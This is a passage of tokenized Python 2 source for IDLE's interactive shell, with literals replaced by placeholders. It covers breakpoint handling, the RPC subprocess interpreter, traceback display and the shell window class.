lineno , "<STR_LIT>" % ( lineno + <NUM_LIT:1> ) ) <EOL> try : <EOL> i = self . breakpoints . index ( lineno ) <EOL> except ValueError : <EOL> self . breakpoints . append ( lineno ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . set_breakpoint_here ( filename , lineno ) <EOL> except : <EOL> pass <EOL> def set_breakpoint_here ( self , event = None ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> lineno = int ( float ( text . index ( "<STR_LIT>" ) ) ) <EOL> self . set_breakpoint ( lineno ) <EOL> def clear_breakpoint_here ( self , event = None ) : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> lineno = int ( float ( text . index ( "<STR_LIT>" ) ) ) <EOL> try : <EOL> self . breakpoints . remove ( lineno ) <EOL> except : <EOL> pass <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . clear_breakpoint_here ( filename , lineno ) <EOL> except : <EOL> pass <EOL> def clear_file_breaks ( self ) : <EOL> if self . breakpoints : <EOL> text = self . text <EOL> filename = self . io . filename <EOL> if not filename : <EOL> text . bell ( ) <EOL> return <EOL> self . breakpoints = [ ] <EOL> text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , END ) <EOL> try : <EOL> debug = self . flist . pyshell . interp . debugger <EOL> debug . clear_file_breaks ( filename ) <EOL> except : <EOL> pass <EOL> def store_file_breaks ( self ) : <EOL> "<STR_LIT>" <EOL> breaks = self . breakpoints <EOL> filename = self . io . filename <EOL> try : <EOL> lines = open ( self . breakpointPath , "<STR_LIT:r>" ) . readlines ( ) <EOL> except IOError : <EOL> lines = [ ] <EOL> new_file = open ( self . breakpointPath , "<STR_LIT:w>" ) <EOL> for line in lines : <EOL> if not line . startswith ( filename + '<STR_LIT:=>' ) : <EOL> new_file . write ( line ) <EOL> self . update_breakpoints ( ) <EOL> breaks = self . breakpoints <EOL> if breaks : <EOL> new_file . write ( filename + '<STR_LIT:=>' + str ( breaks ) + '<STR_LIT:\n>' ) <EOL> new_file . close ( ) <EOL> def restore_file_breaks ( self ) : <EOL> self . text . update ( ) <EOL> filename = self . io . filename <EOL> if filename is None : <EOL> return <EOL> if os . path . isfile ( self . breakpointPath ) : <EOL> lines = open ( self . breakpointPath , "<STR_LIT:r>" ) . readlines ( ) <EOL> for line in lines : <EOL> if line . startswith ( filename + '<STR_LIT:=>' ) : <EOL> breakpoint_linenumbers = eval ( line [ len ( filename ) + <NUM_LIT:1> : ] ) <EOL> for breakpoint_linenumber in breakpoint_linenumbers : <EOL> self . set_breakpoint ( breakpoint_linenumber ) <EOL> def update_breakpoints ( self ) : <EOL> "<STR_LIT>" <EOL> text = self . text <EOL> ranges = text . tag_ranges ( "<STR_LIT>" ) <EOL> linenumber_list = self . ranges_to_linenumbers ( ranges ) <EOL> self . breakpoints = linenumber_list <EOL> def ranges_to_linenumbers ( self , ranges ) : <EOL> """<STR_LIT>""" <EOL> lines = [ ] <EOL> for index in range ( <NUM_LIT:0> , len ( ranges ) , <NUM_LIT:2> ) : <EOL> lineno = int ( float ( str ( ranges [ index ] ) ) ) <EOL> end = int ( float ( str ( ranges [ index + <NUM_LIT:1> ] ) ) ) <EOL> while lineno < end : <EOL> lines . append ( lineno ) <EOL> lineno += <NUM_LIT:1> <EOL> return lines <EOL> def _close ( self ) : <EOL> "<STR_LIT>" <EOL> self . clear_file_breaks ( ) <EOL> EditorWindow . _close ( self ) <EOL> class PyShellFileList ( FileList ) : <EOL> "<STR_LIT>" <EOL> EditorWindow = PyShellEditorWindow <EOL> pyshell = None <EOL> def open_shell ( self , event = None ) : <EOL> if self . pyshell : <EOL> self . pyshell . top . wakeup ( ) <EOL> else : <EOL> self . pyshell = PyShell ( self ) <EOL> if self . pyshell : <EOL> if not self . pyshell . begin ( ) : <EOL> return None <EOL> return self . pyshell <EOL> class ModifiedColorDelegator ( ColorDelegator ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> ColorDelegator . __init__ ( self ) <EOL> self . LoadTagDefs ( ) <EOL> def recolorize_main ( self ) : <EOL> self . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> self . tag_add ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> ColorDelegator . recolorize_main ( self ) <EOL> def LoadTagDefs ( self ) : <EOL> ColorDelegator . LoadTagDefs ( self ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . tagdefs . update ( { <EOL> "<STR_LIT>" : { '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : idleConf . GetHighlight ( theme , "<STR_LIT>" ) , <EOL> } ) <EOL> class ModifiedUndoDelegator ( UndoDelegator ) : <EOL> "<STR_LIT>" <EOL> def insert ( self , index , chars , tags = None ) : <EOL> try : <EOL> if self . delegate . compare ( index , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . delegate . bell ( ) <EOL> return <EOL> except TclError : <EOL> pass <EOL> UndoDelegator . insert ( self , index , chars , tags ) <EOL> def delete ( self , index1 , index2 = None ) : <EOL> try : <EOL> if self . delegate . compare ( index1 , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . delegate . bell ( ) <EOL> return <EOL> except TclError : <EOL> pass <EOL> UndoDelegator . delete ( self , index1 , index2 ) <EOL> class MyRPCClient ( rpc . RPCClient ) : <EOL> def handle_EOF ( self ) : <EOL> "<STR_LIT>" <EOL> raise EOFError <EOL> class ModifiedInterpreter ( InteractiveInterpreter ) : <EOL> def __init__ ( self , tkconsole ) : <EOL> self . tkconsole = tkconsole <EOL> locals = sys . modules [ '<STR_LIT:__main__>' ] . __dict__ <EOL> InteractiveInterpreter . __init__ ( self , locals = locals ) <EOL> self . save_warnings_filters = None <EOL> self . restarting = False <EOL> self . subprocess_arglist = None <EOL> self . port = PORT <EOL> rpcclt = None <EOL> rpcproc = None <EOL> def spawn_subprocess ( self ) : <EOL> if self . subprocess_arglist is None : <EOL> self . subprocess_arglist = self . build_subprocess_arglist ( ) <EOL> args = self . subprocess_arglist <EOL> self . rpcproc = subprocess . Popen ( [ sys . executable ] + args [ <NUM_LIT:1> : ] ) <EOL> def build_subprocess_arglist ( self ) : <EOL> assert ( self . port != <NUM_LIT:0> ) , ( <EOL> "<STR_LIT>" ) <EOL> w = [ '<STR_LIT>' + s for s in sys . warnoptions ] <EOL> if <NUM_LIT:1> / <NUM_LIT:2> > <NUM_LIT:0> : <EOL> w . append ( '<STR_LIT>' ) <EOL> del_exitf = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = False , type = '<STR_LIT:bool>' ) <EOL> if __name__ == '<STR_LIT>' : <EOL> command = "<STR_LIT>" % ( del_exitf , ) <EOL> else : <EOL> command = "<STR_LIT>" % ( del_exitf , ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' and '<STR_LIT:U+0020>' in sys . executable : <EOL> decorated_exec = '<STR_LIT>' % sys . executable <EOL> else : <EOL> decorated_exec = sys . executable <EOL> return [ decorated_exec ] + w + [ "<STR_LIT:-c>" , command , str ( self . port ) ] <EOL> def start_subprocess ( self ) : <EOL> addr = ( HOST , self . port ) <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> time . sleep ( i ) <EOL> try : <EOL> self . rpcclt = MyRPCClient ( addr ) <EOL> break <EOL> except socket . error , err : <EOL> pass <EOL> else : <EOL> self . display_port_binding_error ( ) <EOL> return None <EOL> self . port = self . rpcclt . listening_sock . getsockname ( ) [ <NUM_LIT:1> ] <EOL> if PORT != <NUM_LIT:0> : <EOL> self . rpcclt . listening_sock . setsockopt ( socket . SOL_SOCKET , <EOL> socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . spawn_subprocess ( ) <EOL> self . rpcclt . listening_sock . settimeout ( <NUM_LIT:10> ) <EOL> try : <EOL> self . rpcclt . accept ( ) <EOL> except socket . timeout , err : <EOL> self . display_no_subprocess_error ( ) <EOL> return None <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . stdout ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . stderr ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self . tkconsole . flist ) <EOL> self . rpcclt . register ( "<STR_LIT>" , linecache ) <EOL> self . rpcclt . register ( "<STR_LIT>" , self ) <EOL> self . transfer_path ( ) <EOL> self . poll_subprocess ( ) <EOL> return self . rpcclt <EOL> def get_restart_line ( self ) : <EOL> halfbar = ( ( int ( self . tkconsole . width ) - <NUM_LIT:16> ) // <NUM_LIT:2> ) * '<STR_LIT:=>' <EOL> return halfbar + '<STR_LIT>' + halfbar <EOL> def restart_subprocess ( self ) : <EOL> if self . restarting : <EOL> return self . rpcclt <EOL> self . restarting = True <EOL> debug = self . getdebugger ( ) <EOL> if debug : <EOL> try : <EOL> RemoteDebugger . close_subprocess_debugger ( self . rpcclt ) <EOL> except : <EOL> pass <EOL> self . rpcclt . close ( ) <EOL> self . terminate_subprocess ( ) <EOL> console = self . tkconsole <EOL> was_executing = console . executing <EOL> console . executing = False <EOL> self . spawn_subprocess ( ) <EOL> try : <EOL> self . rpcclt . accept ( ) <EOL> except socket . timeout , err : <EOL> self . display_no_subprocess_error ( ) <EOL> return None <EOL> self . transfer_path ( ) <EOL> console . text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if was_executing : <EOL> console . write ( '<STR_LIT:\n>' ) <EOL> console . showprompt ( ) <EOL> console . write ( self . get_restart_line ( ) ) <EOL> console . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> console . showprompt ( ) <EOL> if debug : <EOL> gui = RemoteDebugger . restart_subprocess_debugger ( self . rpcclt ) <EOL> debug . load_breakpoints ( ) <EOL> self . restarting = False <EOL> return self . rpcclt <EOL> def __request_interrupt ( self ) : <EOL> self . rpcclt . remotecall ( "<STR_LIT>" , "<STR_LIT>" , ( ) , { } ) <EOL> def interrupt_subprocess ( self ) : <EOL> threading . Thread ( target = self . __request_interrupt ) . start ( ) <EOL> def kill_subprocess ( self ) : <EOL> try : <EOL> self . rpcclt . close ( ) <EOL> except AttributeError : <EOL> pass <EOL> self . terminate_subprocess ( ) <EOL> self . tkconsole . executing = False <EOL> self . rpcclt = None <EOL> def terminate_subprocess ( self ) : <EOL> "<STR_LIT>" <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> try : <EOL> self . rpcproc . kill ( ) <EOL> except WindowsError : <EOL> pass <EOL> else : <EOL> self . rpcproc . kill ( ) <EOL> self . rpcproc . wait ( ) <EOL> def transfer_path ( self ) : <EOL> self . runcommand ( """<STR_LIT>""" % ( sys . path , ) ) <EOL> active_seq = None <EOL> def poll_subprocess ( self ) : <EOL> clt = self . rpcclt <EOL> if clt is None : <EOL> return <EOL> try : <EOL> response = clt . pollresponse ( self . active_seq , wait = <NUM_LIT> ) <EOL> except ( EOFError , IOError , KeyboardInterrupt ) : <EOL> if self . tkconsole . closing : <EOL> return <EOL> response = None <EOL> self . restart_subprocess ( ) <EOL> if response : <EOL> self . tkconsole . resetoutput ( ) <EOL> self . active_seq = None <EOL> how , what = response <EOL> console = self . tkconsole . console <EOL> if how == "<STR_LIT:OK>" : <EOL> if what is not None : <EOL> print >> console , repr ( what ) <EOL> elif how == "<STR_LIT>" : <EOL> if self . tkconsole . getvar ( "<STR_LIT>" ) : <EOL> self . remote_stack_viewer ( ) <EOL> elif how == "<STR_LIT>" : <EOL> errmsg = "<STR_LIT>" <EOL> print >> sys . __stderr__ , errmsg , what <EOL> print >> console , errmsg , what <EOL> try : <EOL> self . tkconsole . endexecuting ( ) <EOL> except AttributeError : <EOL> pass <EOL> if not self . tkconsole . closing : <EOL> self . tkconsole . text . after ( self . tkconsole . pollinterval , <EOL> self . poll_subprocess ) <EOL> debugger = None <EOL> def setdebugger ( self , debugger ) : <EOL> self . debugger = debugger <EOL> def getdebugger ( self ) : <EOL> return self . debugger <EOL> def open_remote_stack_viewer ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tkconsole . text . after ( <NUM_LIT> , self . remote_stack_viewer ) <EOL> return <EOL> def remote_stack_viewer ( self ) : <EOL> import RemoteObjectBrowser <EOL> oid = self . rpcclt . remotequeue ( "<STR_LIT>" , "<STR_LIT>" , ( "<STR_LIT>" , ) , { } ) <EOL> if oid is None : <EOL> self . tkconsole . root . bell ( ) <EOL> return <EOL> item = RemoteObjectBrowser . StubObjectTreeItem ( self . rpcclt , oid ) <EOL> from TreeWidget import ScrolledCanvas , TreeNode <EOL> top = Toplevel ( self . tkconsole . root ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> background = idleConf . GetHighlight ( theme , '<STR_LIT>' ) [ '<STR_LIT>' ] <EOL> sc = ScrolledCanvas ( top , bg = background , highlightthickness = <NUM_LIT:0> ) <EOL> sc . frame . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> node = TreeNode ( sc . canvas , None , item ) <EOL> node . expand ( ) <EOL> gid = <NUM_LIT:0> <EOL> def execsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = self . stuffsource ( source ) <EOL> self . execfile ( filename , source ) <EOL> def execfile ( self , filename , source = None ) : <EOL> "<STR_LIT>" <EOL> if source is None : <EOL> source = open ( filename , "<STR_LIT:r>" ) . read ( ) <EOL> try : <EOL> code = compile ( source , filename , "<STR_LIT>" ) <EOL> except ( OverflowError , SyntaxError ) : <EOL> self . tkconsole . resetoutput ( ) <EOL> tkerr = self . tkconsole . stderr <EOL> print >> tkerr , '<STR_LIT>' <EOL> print >> tkerr , '<STR_LIT>' <EOL> InteractiveInterpreter . showsyntaxerror ( self , filename ) <EOL> self . tkconsole . showprompt ( ) <EOL> else : <EOL> self . runcode ( code ) <EOL> def runsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = self . stuffsource ( source ) <EOL> self . more = <NUM_LIT:0> <EOL> self . save_warnings_filters = warnings . filters [ : ] <EOL> warnings . filterwarnings ( action = "<STR_LIT:error>" , category = SyntaxWarning ) <EOL> if isinstance ( source , types . UnicodeType ) : <EOL> import IOBinding <EOL> try : <EOL> source = source . encode ( IOBinding . encoding ) <EOL> except UnicodeError : <EOL> self . tkconsole . resetoutput ( ) <EOL> self . write ( "<STR_LIT>" ) <EOL> return <EOL> try : <EOL> return InteractiveInterpreter . runsource ( self , source , filename ) <EOL> finally : <EOL> if self . save_warnings_filters is not None : <EOL> warnings . filters [ : ] = self . save_warnings_filters <EOL> self . save_warnings_filters = None <EOL> def stuffsource ( self , source ) : <EOL> "<STR_LIT>" <EOL> filename = "<STR_LIT>" % self . gid <EOL> self . gid = self . gid + <NUM_LIT:1> <EOL> lines = source . split ( "<STR_LIT:\n>" ) <EOL> linecache . cache [ filename ] = len ( source ) + <NUM_LIT:1> , <NUM_LIT:0> , lines , filename <EOL> return filename <EOL> def prepend_syspath ( self , filename ) : <EOL> "<STR_LIT>" <EOL> self . runcommand ( """<STR_LIT>""" % ( filename , ) ) <EOL> def showsyntaxerror ( self , filename = None ) : <EOL> """<STR_LIT>""" <EOL> text = self . tkconsole . text <EOL> stuff = self . unpackerror ( ) <EOL> if stuff : <EOL> msg , lineno , offset , line = stuff <EOL> if lineno == <NUM_LIT:1> : <EOL> pos = "<STR_LIT>" % ( offset - <NUM_LIT:1> ) <EOL> else : <EOL> pos = "<STR_LIT>" % ( lineno - <NUM_LIT:1> , offset - <NUM_LIT:1> ) <EOL> text . tag_add ( "<STR_LIT>" , pos ) <EOL> text . see ( pos ) <EOL> char = text . get ( pos ) <EOL> if char and char in IDENTCHARS : <EOL> text . tag_add ( "<STR_LIT>" , pos + "<STR_LIT>" , pos ) <EOL> self . tkconsole . resetoutput ( ) <EOL> self . write ( "<STR_LIT>" % str ( msg ) ) <EOL> else : <EOL> self . tkconsole . resetoutput ( ) <EOL> InteractiveInterpreter . showsyntaxerror ( self , filename ) <EOL> self . tkconsole . showprompt ( ) <EOL> def unpackerror ( self ) : <EOL> type , value , tb = sys . exc_info ( ) <EOL> ok = type is SyntaxError <EOL> if ok : <EOL> try : <EOL> msg , ( dummy_filename , lineno , offset , line ) = value <EOL> if not offset : <EOL> offset = <NUM_LIT:0> <EOL> except : <EOL> ok = <NUM_LIT:0> <EOL> if ok : <EOL> return msg , lineno , offset , line <EOL> else : <EOL> return None <EOL> def showtraceback ( self , temp_filename = None ) : <EOL> """<STR_LIT>""" <EOL> self . tkconsole . resetoutput ( ) <EOL> self . checklinecache ( ) <EOL> typ , value , tb = sys . exc_info ( ) <EOL> sys . last_type = typ <EOL> sys . last_value = value <EOL> sys . last_traceback = tb <EOL> tblist = traceback . extract_tb ( tb ) <EOL> del tblist [ : <NUM_LIT:1> ] <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> if temp_filename is not None : <EOL> main_fname = '<STR_LIT>' <EOL> new_tb = [ ] <EOL> for t in tblist : <EOL> fname = main_fname if t [ <NUM_LIT:0> ] == temp_filename else t [ <NUM_LIT:0> ] <EOL> new_tb . append ( ( fname , ) + t [ <NUM_LIT:1> : ] ) <EOL> tblist = new_tb <EOL> else : <EOL> main_fname = tblist [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> tb_print_list ( tblist , main_fname , sys . stdout , sys . stderr ) <EOL> lines = traceback . format_exception_only ( typ , value ) <EOL> map ( sys . stderr . write , lines ) <EOL> if self . tkconsole . getvar ( "<STR_LIT>" ) : <EOL> self . tkconsole . open_stack_viewer ( ) <EOL> def checklinecache ( self ) : <EOL> c = linecache . cache <EOL> for key in c . keys ( ) : <EOL> if key [ : <NUM_LIT:1> ] + key [ - <NUM_LIT:1> : ] != "<STR_LIT>" : <EOL> del c [ key ] <EOL> def runcommand ( self , code ) : <EOL> "<STR_LIT>" <EOL> if self . tkconsole . executing : <EOL> self . display_executing_dialog ( ) <EOL> return <NUM_LIT:0> <EOL> if self . rpcclt : <EOL> self . rpcclt . remotequeue ( "<STR_LIT>" , "<STR_LIT>" , ( code , ) , { } ) <EOL> else : <EOL> exec code in self . locals <EOL> return <NUM_LIT:1> <EOL> def runcode ( self , code , tempname = None ) : <EOL> "<STR_LIT>" <EOL> if self . tkconsole . executing : <EOL> self . interp . restart_subprocess ( ) <EOL> self . checklinecache ( ) <EOL> if self . save_warnings_filters is not None : <EOL> warnings . filters [ : ] = self . save_warnings_filters <EOL> self . save_warnings_filters = None <EOL> debugger = self . debugger <EOL> try : <EOL> self . tkconsole . beginexecuting ( ) <EOL> if not debugger and self . rpcclt is not None : <EOL> self . active_seq = self . rpcclt . asyncqueue ( "<STR_LIT>" , "<STR_LIT>" , <EOL> ( code , tempname ) , { } ) <EOL> elif debugger : <EOL> debugger . run ( code , self . locals ) <EOL> else : <EOL> exec code in self . locals <EOL> except SystemExit : <EOL> if not self . tkconsole . closing : <EOL> if tkMessageBox . askyesno ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT:yes>" , <EOL> master = self . tkconsole . text ) : <EOL> raise <EOL> else : <EOL> self . showtraceback ( ) <EOL> else : <EOL> raise <EOL> except : <EOL> if use_subprocess : <EOL> print >> self . tkconsole . stderr , "<STR_LIT>" <EOL> self . showtraceback ( ) <EOL> self . tkconsole . endexecuting ( ) <EOL> else : <EOL> if self . tkconsole . canceled : <EOL> self . tkconsole . canceled = False <EOL> print >> self . tkconsole . stderr , "<STR_LIT>" <EOL> else : <EOL> self . showtraceback ( tempname ) <EOL> finally : <EOL> if not use_subprocess : <EOL> try : <EOL> self . tkconsole . endexecuting ( ) <EOL> except AttributeError : <EOL> pass <EOL> def write ( self , s ) : <EOL> "<STR_LIT>" <EOL> self . tkconsole . stderr . write ( s ) <EOL> def display_port_binding_error ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . text ) <EOL> def display_no_subprocess_error ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . text ) <EOL> def display_executing_dialog ( self ) : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . tkconsole . text ) <EOL> class PyShell ( OutputWindow ) : <EOL> shell_title = "<STR_LIT>" <EOL> ColorDelegator = ModifiedColorDelegator <EOL> UndoDelegator = ModifiedUndoDelegator <EOL> menu_specs = [ <EOL> ( "<STR_LIT:file>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> del menu_specs [ - <NUM_LIT:3> ] <EOL> menu_specs [ - <NUM_LIT:2> ] = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from IdleHistory import History <EOL> def __init__ ( self , flist = None ) : <EOL> if use_subprocess : <EOL> ms = self . menu_specs <EOL> if ms [ <NUM_LIT:2> ] [ <NUM_LIT:0> ] != "<STR_LIT>" : <EOL> ms . insert ( <NUM_LIT:2> , ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . interp = ModifiedInterpreter ( self ) <EOL> if flist is None : <EOL> root = Tk ( ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> flist = PyShellFileList ( root ) <EOL> OutputWindow . __init__ ( self , flist , None , None ) <EOL> self . usetabs = True <EOL> self . indentwidth = <NUM_LIT:8> <EOL> self . context_use_ps1 = True <EOL> text = self . text <EOL> text . configure ( wrap = "<STR_LIT>" ) <EOL> text . bind ( "<STR_LIT>" , self . enter_callback ) <EOL> text . bind ( "<STR_LIT>" , self . linefeed_callback ) <EOL> text . bind ( "<STR_LIT>" , self . cancel_callback ) <EOL> text . bind ( "<STR_LIT>" , self . eof_callback ) <EOL> text . bind ( "<STR_LIT>" , self . open_stack_viewer ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_debugger ) <EOL> text . bind ( "<STR_LIT>" , self . toggle_jit_stack_viewer ) <EOL> if use_subprocess : <EOL> text . bind ( "<STR_LIT>" , self . view_restart_mark ) <EOL> text . bind ( "<STR_LIT>" , self . restart_shell ) <EOL> self . save_stdout = sys . stdout <EOL> self . save_stderr = sys . stderr <EOL> self . save_stdin = sys . stdin <EOL> import IOBinding <EOL> self . stdout = PseudoFile ( self , "<STR_LIT>" , IOBinding . encoding ) <EOL> self . stderr = PseudoStderrFile ( self , encoding = IOBinding . encoding ) <EOL> self . console = PseudoFile ( self , "<STR_LIT>" , IOBinding . encoding ) <EOL> if not use_subprocess : <EOL> sys . stdout = self . stdout <EOL> sys . stderr = self . stderr <EOL> sys . stdin = self <EOL> self . history = self . History ( self . text ) <EOL> self . pollinterval = <NUM_LIT:50> <EOL> self . _cleanup_funcs = [ ] <EOL> def append_cleanup_func ( self , func , * args , ** kwargs ) : <EOL> self . _cleanup_funcs . append ( ( func , args , kwargs ) ) <EOL> def get_standard_extension_names ( self ) : <EOL> return idleConf . GetExtensions ( shell_only = True ) <EOL> reading = False <EOL> executing = False <EOL> canceled = False <EOL> endoffile = False <EOL> closing = False <EOL> def set_warning_stream ( self , stream ) : <EOL> global warning_stream <EOL> warning_stream = stream <EOL> def get_warning_stream ( self ) : <EOL> return warning_stream <EOL> def toggle_debugger ( self , event = None ) : <EOL> if self . executing : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> self . set_debugger_indicator ( ) <EOL> return "<STR_LIT>" <EOL> else : <EOL> db = self . interp . getdebugger ( ) <EOL> if db : <EOL> self . close_debugger ( ) <EOL> else : <EOL> self . open_debugger ( ) <EOL> def set_debugger_indicator ( self ) : <EOL> db = self . interp . getdebugger ( ) <EOL> self . setvar ( "<STR_LIT>" , not not db ) <EOL> def toggle_jit_stack_viewer ( self , event = None ) : <EOL> pass <EOL> def close_debugger ( self ) : <EOL> db = self . interp . getdebugger ( ) <EOL> if db : <EOL> self . interp . setdebugger ( None ) <EOL> db . close ( ) <EOL> if self . interp . rpcclt : <EOL> RemoteDebugger . close_remote_debugger ( self . interp . rpcclt ) <EOL> self . resetoutput ( ) <EOL> self . console . write ( "<STR_LIT>" ) <EOL> sys . ps1 = "<STR_LIT>" <EOL> self . showprompt ( ) <EOL> self . set_debugger_indicator ( ) <EOL> def open_debugger ( self ) : <EOL> if self . interp . rpcclt : <EOL> dbg_gui = RemoteDebugger . start_remote_debugger ( self . interp . rpcclt , <EOL> self ) <EOL> else : <EOL> dbg_gui = Debugger . Debugger ( self ) <EOL> self . interp . setdebugger ( dbg_gui ) <EOL> dbg_gui . load_breakpoints ( ) <EOL> sys . ps1 = "<STR_LIT>" <EOL> self . showprompt ( ) <EOL> self . set_debugger_indicator ( ) <EOL> def beginexecuting ( self ) : <EOL> "<STR_LIT>" <EOL> self . resetoutput ( ) <EOL> self . executing = <NUM_LIT:1> <EOL> def endexecuting ( self ) : <EOL> "<STR_LIT>" <EOL> self . executing = <NUM_LIT:0> <EOL> self . canceled = <NUM_LIT:0> <EOL> self . showprompt ( ) <EOL> for func , args , kwargs in self . _cleanup_funcs : <EOL> func ( * args , ** kwargs ) <EOL> self . _cleanup_funcs = [ ] <EOL> def close ( self ) : <EOL> "<STR_LIT>" <EOL> if self . executing : <EOL> response = tkMessageBox . askokcancel ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> parent = self . text ) <EOL> if response is False : <EOL> return "<STR_LIT>" <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> self . canceled = True <EOL> self . closing = True <EOL> self . text . after ( <NUM_LIT:2> * self . pollinterval , self . close2 ) <EOL> def close2 ( self ) : <EOL> return EditorWindow . close ( self ) <EOL> def _close ( self ) : <EOL> "<STR_LIT>" <EOL> self . close_debugger ( ) <EOL> if use_subprocess : <EOL> self . interp . kill_subprocess ( ) <EOL> sys . stdout = self . save_stdout <EOL> sys . stderr = self . save_stderr <EOL> sys . stdin = self . save_stdin <EOL> self . interp = None <EOL> self . console = None <EOL> self . flist . pyshell = None <EOL> self . history = None <EOL> EditorWindow . _close ( self ) <EOL> def ispythonsource ( self , filename ) : <EOL> "<STR_LIT>" <EOL> return True <EOL> def short_title ( self ) : <EOL> return self . shell_title <EOL> COPYRIGHT = '<STR_LIT>' <EOL> def begin ( self ) : <EOL> self . resetoutput ( ) <EOL> if use_subprocess : <EOL> nosub = '<STR_LIT>' <EOL> client = self . interp . start_subprocess ( ) <EOL> if not client : <EOL> self . close ( ) <EOL> return False <EOL> else : <EOL> nosub = "<STR_LIT>" <EOL> self . write ( "<STR_LIT>" % <EOL> ( sys . version , sys . platform , self . COPYRIGHT , nosub ) ) <EOL> self . showprompt ( ) <EOL> import Tkinter <EOL> Tkinter . _default_root = None <EOL> return True <EOL> def readline ( self ) : <EOL> save = self . reading <EOL> try : <EOL> self . reading = <NUM_LIT:1> <EOL> self . top . mainloop ( ) <EOL> finally : <EOL> self . reading = save <EOL> line = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if len ( line ) == <NUM_LIT:0> : <EOL> line = "<STR_LIT:\n>" <EOL> if isinstance ( line , unicode ) : <EOL> import IOBinding <EOL> try : <EOL> line = line . encode ( IOBinding . encoding ) <EOL> except UnicodeError : <EOL> pass <EOL> self . resetoutput ( ) <EOL> if self . canceled : <EOL> self . canceled = <NUM_LIT:0> <EOL> if not use_subprocess : <EOL> raise KeyboardInterrupt <EOL> if self . endoffile : <EOL> self . endoffile = <NUM_LIT:0> <EOL> line = "<STR_LIT>" <EOL> return line <EOL> def isatty ( self ) : <EOL> return True <EOL> def cancel_callback ( self , event = None ) : <EOL> try : <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return <EOL> except : <EOL> pass <EOL> if not ( self . executing or self . reading ) : <EOL> self . resetoutput ( ) <EOL> self . interp . write ( "<STR_LIT>" ) <EOL> self . showprompt ( ) <EOL> return "<STR_LIT>" <EOL> self . endoffile = <NUM_LIT:0> <EOL> self . canceled = <NUM_LIT:1> <EOL> if ( self . executing and self . interp . rpcclt ) : <EOL> if self . interp . getdebugger ( ) : <EOL> self . interp . restart_subprocess ( ) <EOL> else : <EOL> self . interp . interrupt_subprocess ( ) <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> return "<STR_LIT>" <EOL> def eof_callback ( self , event ) : <EOL> if self . executing and not self . reading : <EOL> return <EOL> if not ( self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , 